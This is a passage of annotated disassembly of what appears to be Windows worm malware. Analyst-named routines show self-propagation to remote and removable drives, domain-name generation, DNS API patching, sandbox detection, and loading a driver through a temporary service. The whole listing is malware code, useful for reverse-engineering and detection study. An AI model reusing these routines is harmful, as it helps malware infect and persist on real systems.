push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_run_dll
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7784
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push esi ; nBufferLength
call ds:GetTempPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_run_dll
pop ecx
pop ecx
loc_9A7784: ; CODE XREF: sub_call_run_dll+D1�j
; sub_call_run_dll+F3�j
pop edi
loc_9A7785: ; CODE XREF: sub_call_run_dll+77�j
pop esi
pop ebx
leave
retn
sub_call_run_dll endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_main+1FF�o
var_1AC = dword ptr -1ACh
dwFlags = dword ptr -198h
var_194 = dword ptr -194h
WSAData = WSAData ptr -190h
sub esp, 198h
push ebx
push ebp
push esi
push edi
push 8003h ; uMode
call ds:SetErrorMode
call sub_call_srand_with_seed_from_thread_id
push offset CriticalSection ; lpCriticalSection
call sub_InitializeCriticalSection_decrypt_files
pop ecx
call sub_9A722A
xor esi, esi
cmp eax, esi
jge short loc_9A77C0
push eax
call sub_call_run_dll
pop ecx
loc_9A77C0: ; CODE XREF: StartAddress+2E�j
sldt ax
cmp ax, si
jz short loc_9A77D0
push 0FFFFFFFFh ; dwMilliseconds
call ds:Sleep
loc_9A77D0: ; CODE XREF: StartAddress+3D�j
call sub_9A7170
call ds:GetVersion
cmp ax, 5
jnz short loc_9A7803
call sub_9AB59B
lea eax, [esp+1A8h+dwFlags]
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_SetNamedPipeServer ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
jmp short loc_9A7808
; ---------------------------------------------------------------------------
loc_9A7803: ; CODE XREF: StartAddress+56�j
call sub_find_svchost_and_attach
loc_9A7808: ; CODE XREF: StartAddress+78�j
push offset dword_9BAF78
call sub_9A91E7
pop ecx
mov [esp+1A8h+dwFlags], esi
mov [esp+1A8h+var_194], esi
call sub_9A722A
cmp eax, 0FFFFFFFEh
mov edi, offset FileName ; "c:\\c.dll"
jz short loc_9A7837
push 120089h ; int
push edi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9A7837: ; CODE XREF: StartAddress+9F�j
push edi ; lpFileName
push offset nNumberOfBytesToWrite ; int
call sub_9AC769
cmp eax, esi
pop ecx
pop ecx
mov lpBuffer, eax
jz short loc_9A787E
mov ecx, [eax+3Ch]
add ecx, eax
movzx edx, word ptr [ecx+6]
lea edx, [edx+edx*4]
lea edx, [ecx+edx*8+0F8h]
mov ecx, [edx-18h]
add ecx, [edx-14h]
mov edx, nNumberOfBytesToWrite
cmp edx, ecx
jbe short loc_9A7886
add eax, ecx
sub edx, ecx
mov [esp+1A8h+dwFlags], eax
mov [esp+1A8h+var_194], edx
jmp short loc_9A7886
; ---------------------------------------------------------------------------
loc_9A787E: ; CODE XREF: StartAddress+C2�j
push 0FFFFFFFFh ; dwMilliseconds
call ds:Sleep
loc_9A7886: ; CODE XREF: StartAddress+E5�j
; StartAddress+F3�j
mov ebx, ds:CreateFileA
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 2 ; dwShareMode
mov ebp, 80000000h
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_9A78B7
xor eax, eax
push eax ; hTemplateFile
push eax ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push eax ; lpSecurityAttributes
push 3 ; dwShareMode
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A78CE
loc_9A78B7: ; CODE XREF: StartAddress+118�j
xor ebp, ebp
push ebp ; nNumberOfBytesToLockHigh
push ebp ; lpFileSizeHigh
push esi ; hFile
call ds:GetFileSize
push eax ; nNumberOfBytesToLockLow
push ebp ; dwFileOffsetHigh
push ebp ; dwFileOffsetLow
push esi ; hFile
call ds:LockFile
jmp short loc_9A78D0
; ---------------------------------------------------------------------------
loc_9A78CE: ; CODE XREF: StartAddress+12C�j
xor ebp, ebp
loc_9A78D0: ; CODE XREF: StartAddress+143�j
call sub_9A722A
cmp eax, 0FFFFFFFEh
jz short loc_9A78E4
push 20h ; int
push edi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9A78E4: ; CODE XREF: StartAddress+14F�j
push offset ServiceName ; lpServiceName
call sub_9AC553
mov [esp+1ACh+var_1AC], offset dword_9A1554
call sub_9AC553
mov edi, ds:Sleep
mov [esp+1ACh+var_1AC], 3A98h
call edi ; Sleep
lea eax, [esp+1A8h+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup
call sub_local_http_create_server_local_scan
test eax, eax
jz short loc_9A793B
push [esp+1A8h+var_194]
push [esp+1ACh+dwFlags]
call sub_rc4_part_of_unpakced_dll_file
pop ecx
pop ecx
call sub_infect_locally
call sub_outbound_scans
loc_9A793B: ; CODE XREF: StartAddress+197�j
call sub_infect_remote_and_removable_drives
push 1B7740h ; dwMilliseconds
loc_9A7945: ; CODE XREF: StartAddress+202�j
call edi ; Sleep
loc_9A7947: ; CODE XREF: StartAddress+1FB�j
push ebp ; dwReserved
lea eax, [esp+1ACh+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jz short loc_9A7986
call sub_domain_names_generation
call sub_package_succesfully_downloaded_set_to_1_if_0
push 12h
pop ebx
loc_9A7964: ; CODE XREF: StartAddress+1F9�j
push 927C0h ; dwMilliseconds
call edi ; Sleep
push 64h ; int
mov esi, offset CriticalSection
push esi ; lpCriticalSection
call sub_9A8C5D
push esi ; lpCriticalSection
call sub_9A8BC6
add esp, 0Ch
dec ebx
jnz short loc_9A7964
jmp short loc_9A7947
; ---------------------------------------------------------------------------
loc_9A7986: ; CODE XREF: StartAddress+1CC�j
push 0EA60h
jmp short loc_9A7945
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_main(HMODULE hModule)
sub_main proc near ; CODE XREF: DllMain(x,x,x)+8E�p
Name = byte ptr -210h
var_111 = byte ptr -111h
Str = byte ptr -110h
var_10F = byte ptr -10Fh
var_10 = dword ptr -10h
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hModule = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push 3Fh
xor eax, eax
xor ebx, ebx
mov [ebp+Str], bl
pop ecx
lea edi, [ebp+var_10F]
rep stosd
stosw
stosb
call sub_9ACFF6
call sub_9AB49A
push 104h ; nSize
mov edi, offset FileName ; "c:\\c.dll"
push edi ; lpFilename
push [ebp+hModule] ; hModule
call ds:GetModuleFileNameA
push 1 ; int
push offset aUmservicesstat ; "umServicesStatusW"
mov byte_9BAF6B, bl
call sub_9AC5D7
pop ecx
pop ecx
lea eax, [ebp+ThreadId]
push eax ; nSize
lea eax, [ebp+Str]
mov esi, 100h
push eax ; lpBuffer
mov [ebp+ThreadId], esi
call ds:GetComputerNameA
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A9237
mov dword_9BAF74, eax
xor eax, 2F53508Bh
push eax ; Seed
call ds:srand
call ds:rand
push 3
pop ecx
cdq
idiv ecx
add edx, 6
push edx
push offset aMarnwkcw ; "marnwkcw"
call sub_make_array_of_alphabet
call sub_call_srand_with_seed_from_thread_id
push 7
push dword_9BAF74
lea eax, [ebp+Name]
push offset Format ; "SCManagerW"
push esi ; Count
push eax ; Dest
call ds:_snprintf
add esp, 2Ch
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialOwner
push ebx ; lpMutexAttributes
mov [ebp+var_111], bl
call ds:CreateMutexA
mov hObject, eax
call ds:GetLastError
mov [ebp+var_8], eax
call ds:GetCommandLineA
mov esi, ds:StrStrIA
push offset Srch
push eax
mov [ebp+var_4], eax
call esi ; StrStrIA
test eax, eax
jz loc_9A7B29
call sub_9A72CA
cmp [ebp+var_8], 0B7h
mov [ebp+var_10], eax
jz short loc_9A7B03
cmp [ebp+var_8], 5
jz short loc_9A7B03
push hObject ; hObject
call ds:CloseHandle
call sub_9A74E1
test eax, eax
jz short loc_9A7B03
xor edi, edi
loc_9A7AD3: ; CODE XREF: sub_main+174�j
push 0BB8h ; dwMilliseconds
call ds:Sleep
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 1 ; dwDesiredAccess
call ds:OpenMutexA
test eax, eax
jnz short loc_9A7B03
call ds:GetLastError
cmp eax, 5
jz short loc_9A7B03
inc edi
cmp edi, 3
jl short loc_9A7AD3
loc_9A7B03: ; CODE XREF: sub_main+127�j
; sub_main+12D�j ...
cmp [ebp+var_10], ebx
jz short loc_9A7B0F
call sub_9A7410
jmp short loc_9A7B22
; ---------------------------------------------------------------------------
loc_9A7B0F: ; CODE XREF: sub_main+179�j
push offset aMarnwkcw ; "marnwkcw"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jnz short loc_9A7B22
call sub_attach_to_explorer
loc_9A7B22: ; CODE XREF: sub_main+180�j
; sub_main+18E�j
push ebx ; uExitCode
call ds:ExitProcess
; ---------------------------------------------------------------------------
loc_9A7B29: ; CODE XREF: sub_main+112�j
call ds:GetVersion
cmp ax, 5
jnz short loc_9A7B4F
push offset aYsecurity ; "ySecurity"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B4F
call sub_patch_NetpwPathCanonicalize
call sub_patch_DNS_rslvr_APIs
jmp short loc_9A7B77
; ---------------------------------------------------------------------------
loc_9A7B4F: ; CODE XREF: sub_main+1A6�j
; sub_main+1B4�j
push offset aRegopenkeyexw ; "RegOpenKeyExW"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B64
call sub_patch_NetpwPathCanonicalize
jmp short loc_9A7B77
; ---------------------------------------------------------------------------
loc_9A7B64: ; CODE XREF: sub_main+1CE�j
push offset dword_9A1568
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B77
call sub_patch_DNS_APIs
loc_9A7B77: ; CODE XREF: sub_main+1C0�j
; sub_main+1D5�j ...
cmp [ebp+var_8], 0B7h
jz short loc_9A7BA2
cmp [ebp+var_8], 5
jz short loc_9A7BA2
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
jmp short loc_9A7BB6
; ---------------------------------------------------------------------------
loc_9A7BA2: ; CODE XREF: sub_main+1F1�j
; sub_main+1F7�j
call sub_9A722A
cmp eax, 0FFFFFFFFh
jnz short loc_9A7BB6
push 4 ; dwFlags
push ebx ; lpNewFileName
push edi ; lpExistingFileName
call ds:MoveFileExA
loc_9A7BB6: ; CODE XREF: sub_main+213�j
; sub_main+21D�j
pop edi
pop esi
pop ebx
leave
retn
sub_main endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: start+4B�p
Name = byte ptr -14h
hModule = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+fdwReason], ebx
push esi
push edi
jnz loc_9A7C55
mov edi, [ebp+lpvReserved]
test edi, edi
jz short loc_9A7BDA
mov [ebp+hModule], edi
loc_9A7BDA: ; CODE XREF: DllMain(x,x,x)+1A�j
push [ebp+hModule] ; hLibModule
call ds:DisableThreadLibraryCalls
test edi, edi
jz short loc_9A7C3C
call ds:GetCurrentProcessId
push eax ; Seed
call ds:srand
call ds:rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp+Name]
add edx, 0Ah
push edx
push eax
call sub_make_array_of_alphabet
add esp, 0Ch
lea eax, [ebp+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call ds:CreateMutexA
mov esi, eax
test esi, esi
jz short loc_9A7C3C
call ds:GetLastError
cmp eax, 0B7h
jnz short loc_9A7C3C
push esi ; hObject
call ds:CloseHandle
xor eax, eax
jmp short loc_9A7C57
; ---------------------------------------------------------------------------
loc_9A7C3C: ; CODE XREF: DllMain(x,x,x)+2A�j
; DllMain(x,x,x)+67�j ...
call ds:GetVersion
cmp al, 5
jb short loc_9A7C4F
push [ebp+hModule] ; hModule
call sub_main
pop ecx
loc_9A7C4F: ; CODE XREF: DllMain(x,x,x)+89�j
test edi, edi
jz short loc_9A7C55
xor ebx, ebx
loc_9A7C55: ; CODE XREF: DllMain(x,x,x)+F�j
; DllMain(x,x,x)+96�j
mov eax, ebx
loc_9A7C57: ; CODE XREF: DllMain(x,x,x)+7F�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
_DllMain@12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7C5E proc near ; CODE XREF: sub_9A7CBF+157�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_9A25D8
call __SEH_prolog
mov edi, ecx
or eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
xor edx, edx
mov [ebp+ms_exc.disabled], edx
loc_9A7C77: ; CODE XREF: sub_9A7C5E+5B�j
mov [ebp+var_20], edx
movzx ecx, word ptr [edi+6]
cmp edx, ecx
jnb short loc_9A7CA9
lea ecx, [edx+edx*4]
lea ecx, [edi+ecx*8+0F8h]
mov esi, [ecx+14h]
cmp [ebp+arg_0], esi
jb short loc_9A7CB8
mov ebx, [ecx+10h]
add ebx, esi
cmp [ebp+arg_0], ebx
jnb short loc_9A7CB8
mov eax, [ecx+0Ch]
sub eax, esi
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
loc_9A7CA9: ; CODE XREF: sub_9A7C5E+22�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_2
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9A7CB8: ; CODE XREF: sub_9A7C5E+34�j
; sub_9A7C5E+3E�j
inc edx
jmp short loc_9A7C77
sub_9A7C5E endp
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9A7CBF proc near ; CODE XREF: sub_9A7E49+64�p
VersionInformation= _OSVERSIONINFOA ptr -0B4h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
Buf2 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 0B4h
push esi
mov esi, eax
cmp word ptr [esi], 5A4Dh
jnz loc_9A7E41
mov ecx, [ebp+70h+arg_4]
mov eax, [esi+3Ch]
add ecx, 0FFFFFF08h
cmp eax, ecx
jg loc_9A7E41
add eax, esi
cmp dword ptr [eax], 4550h
mov [ebp+70h+var_18], eax
jnz loc_9A7E41
lea eax, [ebp+70h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+70h+VersionInformation.dwOSVersionInfoSize], 9Ch
call ds:GetVersionExA
test eax, eax
jz loc_9A7E41
push ebx
xor ebx, ebx
cmp [ebp+70h+VersionInformation.dwMajorVersion], 5
mov [ebp+70h+var_10], ebx
jnz loc_9A7DA6
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFF7h
cmp eax, ebx
mov [ebp+70h+Buf2], 0FFh
mov [ebp+70h+var_3], 0D6h
mov [ebp+70h+var_2], 0C7h
mov [ebp+70h+var_1], 5
mov [ebp+70h+var_14], eax
jbe loc_9A7E3B
loc_9A7D47: ; CODE XREF: sub_9A7CBF+A9�j
push 4 ; Size
lea eax, [ebp+70h+Buf2]
push eax ; Buf2
lea eax, [ebx+esi]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7D64
cmp byte ptr [ebx+esi+8], 0Ah
jz short loc_9A7D6F
loc_9A7D64: ; CODE XREF: sub_9A7CBF+9C�j
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7D47
jmp loc_9A7E3B
; ---------------------------------------------------------------------------
loc_9A7D6F: ; CODE XREF: sub_9A7CBF+A3�j
cmp ebx, 0FFFFFFFFh
jz loc_9A7E3B
mov eax, [ebp+70h+var_18]
mov esi, [ebx+esi+4]
sub esi, [eax+34h]
cmp esi, [eax+50h]
jnb loc_9A7E3B
mov eax, [ebp+70h+arg_0]
mov [edi], esi
mov [edi+8], eax
mov dword ptr [edi+4], 0Ah
mov [ebp+70h+var_10], 1
jmp loc_9A7E3B
; ---------------------------------------------------------------------------
loc_9A7DA6: ; CODE XREF: sub_9A7CBF+61�j
cmp [ebp+70h+VersionInformation.dwMajorVersion], 6
jnz loc_9A7E3B
cmp [ebp+70h+VersionInformation.dwMinorVersion], ebx
jnz loc_9A7E3B
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFEFh
cmp eax, ebx
mov [ebp+70h+var_2], 8Bh
mov [ebp+70h+var_1], 15h
mov [ebp+70h+var_C], 83h
mov [ebp+70h+var_B], 0FAh
mov [ebp+70h+var_A], 0Ah
mov [ebp+70h+var_9], 0Fh
mov [ebp+70h+var_8], 87h
mov [ebp+70h+var_14], eax
jbe short loc_9A7E3B
loc_9A7DE2: ; CODE XREF: sub_9A7CBF+17A�j
push 2 ; Size
lea eax, [ebp+70h+var_2]
push eax ; Buf2
lea eax, [esi+ebx]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E35
push 5 ; Size
lea eax, [ebp+70h+var_C]
push eax ; Buf2
lea eax, [ebx+esi+6]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E35
mov ecx, [ebp+70h+var_18]
lea eax, [ebx+0Bh]
push eax
call sub_9A7C5E
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_9A7E35
and dword ptr [edi+8], 0
mov [edi], eax
mov eax, [ebx+esi+0Bh]
mov [edi+4], eax
mov [ebp+70h+var_10], 1
loc_9A7E35: ; CODE XREF: sub_9A7CBF+137�j
; sub_9A7CBF+14E�j ...
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7DE2
loc_9A7E3B: ; CODE XREF: sub_9A7CBF+82�j
; sub_9A7CBF+AB�j ...
mov eax, [ebp+70h+var_10]
pop ebx
jmp short loc_9A7E43
; ---------------------------------------------------------------------------
loc_9A7E41: ; CODE XREF: sub_9A7CBF+13�j
; sub_9A7CBF+27�j ...
xor eax, eax
loc_9A7E43: ; CODE XREF: sub_9A7CBF+180�j
pop esi
add ebp, 70h
leave
retn
sub_9A7CBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7E49 proc near ; CODE XREF: sub_9A812E+5A�p
FileName = byte ptr -128h
var_25 = byte ptr -25h
hMem = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset aCtlsocket ; "ctlsocket"
call __SEH_prolog
and [ebp+var_1C], 0
mov esi, 104h
push esi ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA
push esi ; Count
push offset byte_9A25E4 ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call ds:strncat
mov [ebp+var_25], 0
lea eax, [ebp+FileName]
push eax ; lpFileName
lea eax, [ebp+var_20]
push eax ; int
call sub_9AC769
add esp, 14h
mov [ebp+hMem], eax
test eax, eax
jz short loc_9A7ECD
and [ebp+ms_exc.disabled], 0
push [ebp+var_20]
push [ebp+arg_0]
mov edi, [ebp+arg_4]
call sub_9A7CBF
pop ecx
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A7EC0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_9A7EC0: ; CODE XREF: sub_9A7E49+6E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hMem] ; hMem
call ds:GlobalFree
loc_9A7ECD: ; CODE XREF: sub_9A7E49+55�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A7E49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7ED6(LPCSTR lpServiceName)
sub_9A7ED6 proc near ; CODE XREF: sub_9A7F9D+16B�p
ServiceStatus = _SERVICE_STATUS ptr -20h
var_4 = dword ptr -4
lpServiceName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
xor esi, esi
push 0F003Fh ; dwDesiredAccess
push esi ; lpDatabaseName
push esi ; lpMachineName
mov [ebp+var_4], esi
call ds:OpenSCManagerA
mov ebx, eax
cmp ebx, esi
jz short loc_9A7F30
push edi
push 0F01FFh ; dwDesiredAccess
push [ebp+lpServiceName] ; lpServiceName
push ebx ; hSCManager
call ds:OpenServiceA
mov edi, eax
cmp edi, esi
mov esi, ds:CloseServiceHandle
jz short loc_9A7F2C
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push edi ; hService
call ds:ControlService
push edi ; hService
mov [ebp+var_4], eax
call ds:DeleteService
push edi ; hSCObject
call esi ; CloseServiceHandle
loc_9A7F2C: ; CODE XREF: sub_9A7ED6+3A�j
push ebx ; hSCObject
call esi ; CloseServiceHandle
pop edi
loc_9A7F30: ; CODE XREF: sub_9A7ED6+1E�j
mov eax, [ebp+var_4]
pop esi
pop ebx
leave
retn
sub_9A7ED6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7F37(LPCSTR lpDisplayName,LPCSTR lpBinaryPathName)
sub_9A7F37 proc near ; CODE XREF: sub_9A7F9D+108�p
hSCObject = dword ptr -4
lpDisplayName = dword ptr 8
lpBinaryPathName= dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push 0F003Fh ; dwDesiredAccess
xor esi, esi
push esi ; lpDatabaseName
push esi ; lpMachineName
call ds:OpenSCManagerA
cmp eax, esi
mov [ebp+hSCObject], eax
jz short loc_9A7F98
push ebx
push edi
push offset WindowName ; "recv"
push esi ; lpServiceStartName
push esi ; lpDependencies
push esi ; lpdwTagId
push esi ; lpLoadOrderGroup
push [ebp+lpBinaryPathName] ; lpBinaryPathName
push esi ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0F01FFh ; dwDesiredAccess
push [ebp+lpDisplayName] ; lpDisplayName
push [ebp+lpDisplayName] ; lpServiceName
push eax ; hSCManager
call ds:CreateServiceA
mov edi, ds:CloseServiceHandle
mov ebx, eax
cmp ebx, esi
jz short loc_9A7F91
push esi ; lpServiceArgVectors
push esi ; dwNumServiceArgs
push ebx ; hService
call ds:StartServiceA
push ebx ; hSCObject
mov esi, eax
call edi ; CloseServiceHandle
loc_9A7F91: ; CODE XREF: sub_9A7F37+4A�j
push [ebp+hSCObject] ; hSCObject
call edi ; CloseServiceHandle
pop edi
pop ebx
loc_9A7F98: ; CODE XREF: sub_9A7F37+19�j
mov eax, esi
pop esi
leave
retn
sub_9A7F37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7F9D(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPVOID lpInBuffer)
sub_9A7F9D proc near ; CODE XREF: sub_9A812E+73�p
PathName = byte ptr -234h
var_131 = byte ptr -131h
FileName = byte ptr -130h
ServiceName = byte ptr -2Ch
BytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
hObject = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpInBuffer = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 234h
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call ds:rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+ServiceName]
add edx, ecx
push edx
push eax
call sub_make_array_of_alphabet
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA
mov esi, ds:GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
mov edi, offset PrefixString ; "ror"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9A802B
lea eax, [ebp+PathName]
push eax ; lpBuffer
push 104h ; nBufferLength
call ds:GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
loc_9A802B: ; CODE XREF: sub_9A7F9D+62�j
mov esi, ds:CreateFileA
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 6 ; dwShareMode
mov edi, 0C0000000h
push edi ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz short loc_9A805A
xor eax, eax
jmp loc_9A8129
; ---------------------------------------------------------------------------
loc_9A805A: ; CODE XREF: sub_9A7F9D+B4�j
lea eax, [ebp+FileName]
push 120136h ; int
push eax ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call ds:WriteFile
test eax, eax
jz loc_9A8110
mov eax, [ebp+nNumberOfBytesToWrite]
cmp [ebp+BytesReturned], eax
jnz short loc_9A8110
push [ebp+hObject] ; hObject
call ds:CloseHandle
lea eax, [ebp+FileName]
push eax ; lpBinaryPathName
lea eax, [ebp+ServiceName]
push eax ; lpDisplayName
call sub_9A7F37
pop ecx
mov [ebp+hObject], eax
pop ecx
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileA
cmp [ebp+hObject], ebx
jz short loc_9A8126
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push ebx ; dwShareMode
push edi ; dwDesiredAccess
push (offset WindowName+4) ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A8104
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpBytesReturned
push ebx ; nOutBufferSize
push ebx ; lpOutBuffer
push 0Ch ; nInBufferSize
push [ebp+lpInBuffer] ; lpInBuffer
push 9C402000h ; dwIoControlCode
push esi ; hDevice
call ds:DeviceIoControl
test eax, eax
jz short loc_9A80FD
mov [ebp+var_8], 1
loc_9A80FD: ; CODE XREF: sub_9A7F9D+157�j
push esi ; hObject
call ds:CloseHandle
loc_9A8104: ; CODE XREF: sub_9A7F9D+13B�j
lea eax, [ebp+ServiceName]
push eax ; lpServiceName
call sub_9A7ED6
pop ecx
jmp short loc_9A8126
; ---------------------------------------------------------------------------
loc_9A8110: ; CODE XREF: sub_9A7F9D+E6�j
; sub_9A7F9D+F2�j
push [ebp+hObject] ; hObject
call ds:CloseHandle
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:DeleteFileA
loc_9A8126: ; CODE XREF: sub_9A7F9D+122�j
; sub_9A7F9D+171�j
mov eax, [ebp+var_8]
loc_9A8129: ; CODE XREF: sub_9A7F9D+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A7F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A812E proc near ; CODE XREF: sub_9A7170+9A�p
VersionInformation= _OSVERSIONINFOA ptr -0A8h
var_14 = word ptr -14h
InBuffer = byte ptr -0Ch
push ebp
lea ebp, [esp-78h]
sub esp, 0A8h
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call ds:GetVersionExA
test eax, eax
jz short loc_9A81AB
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnb short loc_9A8159
xor eax, eax
inc eax
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A8159: ; CODE XREF: sub_9A812E+24�j
jnz short loc_9A817F
xor eax, eax
inc eax
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A81AD
cmp [ebp+78h+VersionInformation.dwMinorVersion], eax
jnz short loc_9A8172
